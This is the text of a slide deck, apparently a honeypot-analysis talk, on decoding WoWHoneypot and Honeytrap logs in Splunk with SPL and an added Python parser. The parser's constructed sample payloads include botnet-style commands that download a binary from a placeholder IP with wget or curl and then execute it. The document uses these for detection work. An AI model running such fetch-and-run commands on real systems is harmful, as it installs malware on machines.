Slide 1

SPLUNK SEC-CHICK

Slide 2

WHO AM I
• sec-chick (@one_sec_chick)
• Honeypots in operation: WoW Honeypot, Honeytrap

Slide 3

Slide 4

Setup shown on the slide: WoWHoneypot and Honeytrap run on a VPS; Splunk runs on a PC; the honeypot logs are fetched from the VPS over SSH.

Slide 5

SPLUNK
• What Splunk is: a platform for indexing and searching machine data such as logs
• Product information: http://www.intellilink.co.jp/pd/products/package/security/splunk.html

Slide 6

• WoWHoneypot

Slide 7

• Honeytrap

Slide 8

Analysis steps
1. SSH: fetch the honeypot logs from the VPS
2. Splunk: ingest the logs
3. Splunk: search
5. Check the payload (Honeytrap stores the payload HEX-encoded)

Slide 9

Attack_connection.local_port: count attacks per destination port (top 10)

Slide 10

Attack_connection.payload.data_hex: the payload is Hex-encoded → decode it to read the request

Slide 11

Slide 12

Agenda
1. Docker
3. Splunk
4. Suricata

Slide 13

DOCKER
• The honeypots are run in Docker containers

Slide 14

• Honeypots (WoWHoneypot, Honeytrap) run in Docker on the VPS
• A cron job transfers the logs to Splunk
(Diagram: Splunk ← VPS honeypot: WoWHoneypot and Honeytrap in Docker)

Slide 15

(Diagram: Splunk ← VPS honeypot: WoWHoneypot and Honeytrap in Docker)

Slide 16

SPLUNK

Slide 17

WOWHONEYPOT

| rex field=_raw "\"(?<date>[^\s]+)\s(?<time>[^\s]+)\s([^\s]+)\s([^\s]+)\s([^\s]+)\s(?<base64_wow>.*$)"
| decrypt field="base64_wow" atob emit('base64_wow_decrypted')
| eval decode=urldecode(base64_wow_decrypted)
| rex field="decode" "wget.+(?<wget_url>https?://[\w/:\.\-]+?)\s"
| rex field="decode" "curl.+(?<curl_url>https?://[\w/:\.\-]+?)\s"

The slide's backslashes were extracted as ¥ and the capture-group names were dropped; base64_wow is the name the decrypt command references, and date, time, wget_url and curl_url are assumed names filled in here. Give the wget and curl groups different names: if both rex commands write the same field and both match, the second overwrites the first. decrypt is not a built-in command; it comes from the Decrypt app on Splunkbase, which provides atob (base64 decode) and unhex.

Slide 18

HONEYTRAP

| decrypt field="attack_connection.payload.data_hex" unhex emit('attack_connection.payload.data_decrypted')
| rex field="attack_connection.payload.data_decrypted" "wget.+(?<wget_url>https?://[\w/:\.\-]+?)\s"
| rex field="attack_connection.payload.data_decrypted" "curl.+(?<curl_url>https?://[\w/:\.\-]+?)\s"

As on the previous slide, ¥ stands for a backslash and the capture-group names (wget_url, curl_url) are assumed. Note that the pattern requires whitespace after the URL, so a download URL that ends the payload without a trailing space or newline is not captured.
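The two SPL pipelines above, together with the per-port count and hex decode of slides 9 and 10, re-implemented in Python as an added example that is not code from the slides, from WoWHoneypot or from Honeytrap, so the decoding can be run and checked offline. It assumes the WoWHoneypot access_log layout "[date time] src_ip dst_host:port rule_id base64(request)" and the Honeytrap JSON fields attack_connection.local_port and attack_connection.payload.data_hex; all sample records are constructed. It deliberately departs from the slides' rex in one way: instead of requiring whitespace after the URL, it stops at the URL's last allowed character or a shell command separator, so a URL at the very end of a payload is still found.

```python
"""Decode WoWHoneypot and Honeytrap records and extract wget/curl download URLs.

Added example, not code from the slides, from WoWHoneypot or from Honeytrap.
WoWHoneypot: base64 -> urldecode -> regex.  Honeytrap: unhex -> regex.
Assumed (not stated on the slides): the WoWHoneypot access_log line layout
"[date time] src_ip dst_host:port rule_id base64(request)" and the Honeytrap
JSON field names attack_connection.local_port / attack_connection.payload.data_hex.
All sample records below are constructed for this example.
"""
import base64
import binascii
import json
import re
from collections import Counter
from urllib.parse import unquote

# A download URL that follows wget or curl within the same shell command.
# Unlike the slides' "wget.+(https?://...+?)\s", no trailing whitespace is
# required, so a URL that ends the payload is captured too.
DOWNLOAD_URL_RE = re.compile(r"\b(?:wget|curl)\b[^;&|\n]*?(https?://[\w/:.\-]+)")


def extract_download_urls(text):
    """Return every wget/curl target URL in order of appearance."""
    return DOWNLOAD_URL_RE.findall(text)


def parse_wow_line(line):
    """Parse one WoWHoneypot access_log line (assumed layout, see module docstring).

    Mirrors the SPL: five whitespace-separated tokens plus the base64 tail,
    then atob, urldecode and the URL regex.
    """
    parts = line.split(None, 5)
    if len(parts) != 6:
        raise ValueError("unexpected WoWHoneypot line: %r" % line)
    date, time_, src_ip, dst, rule_id, b64 = parts
    raw_request = base64.b64decode(b64).decode("utf-8", errors="replace")
    # The SPL urldecodes the whole request, so do the same here.
    decoded = unquote(raw_request)
    return {
        "timestamp": (date + " " + time_).strip("[]"),
        "src_ip": src_ip,
        "dst": dst,
        "rule_id": rule_id,
        "request": decoded,
        "urls": extract_download_urls(decoded),
    }


def parse_honeytrap_event(event_json):
    """Parse one Honeytrap JSON event: unhex payload.data_hex and pull out URLs."""
    conn = json.loads(event_json)["attack_connection"]
    payload = binascii.unhexlify(conn["payload"]["data_hex"]).decode("utf-8", errors="replace")
    return {
        "local_port": int(conn["local_port"]),
        "remote_ip": conn["remote_ip"],
        "payload": payload,
        "urls": extract_download_urls(payload),
    }


def top_local_ports(events, n=10):
    """Equivalent of the slide's top-10 count over attack_connection.local_port."""
    return Counter(e["local_port"] for e in events).most_common(n)


# ---- constructed sample records (not real honeypot data) ----------------------
_WOW_REQUEST = (
    "POST /cgi-bin/test.cgi HTTP/1.1\r\nHost: honeypot.example\r\n\r\n"
    "cmd=wget%20http%3A%2F%2F198.51.100.7%2Fbins%2Fx86%20-O%20%2Ftmp%2Fx%3Bsh%20%2Ftmp%2Fx"
)
SAMPLE_WOW_LINE = ("[2019-01-01 12:00:00+0900] 203.0.113.44 honeypot.example:8080 3 "
                   + base64.b64encode(_WOW_REQUEST.encode()).decode())

_HT_PAYLOAD = (b"enable\r\nsh\r\ncd /tmp; curl -O http://203.0.113.9/arm7; "
               b"wget http://203.0.113.9/mips; chmod +x mips; ./mips\r\n")
SAMPLE_HONEYTRAP_EVENT = json.dumps({
    "attack_connection": {
        "local_ip": "10.0.0.5", "local_port": 23,
        "remote_ip": "203.0.113.44", "remote_port": 51322,
        "protocol": "tcp",
        "payload": {"length": len(_HT_PAYLOAD),
                    "data_hex": binascii.hexlify(_HT_PAYLOAD).decode()},
    }
})

if __name__ == "__main__":
    wow = parse_wow_line(SAMPLE_WOW_LINE)
    print("WoWHoneypot rule", wow["rule_id"], "urls", wow["urls"])
    ht = parse_honeytrap_event(SAMPLE_HONEYTRAP_EVENT)
    print("Honeytrap port", ht["local_port"], "urls", ht["urls"])
    print("top ports", top_local_ports([ht]))
```

Run the file directly to print the URLs recovered from both samples; feed real access_log lines or Honeytrap JSON events to the two parse functions to get the same fields the SPL produces, one dictionary per event.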

Slide 19

HONEYTRAP

Slide 20

SURICATA
• Grep
• Suricata

Slide 21

Thanks to
• @Sec_S_Owl
• @cactus_pots
• @SugitaMuchi
• @soji256
• @morihi_soc
Honeypot community on Twitter and Slack: http://goo.gl/8bLkZA

Slide 22

Slide 23

Summary
• Splunk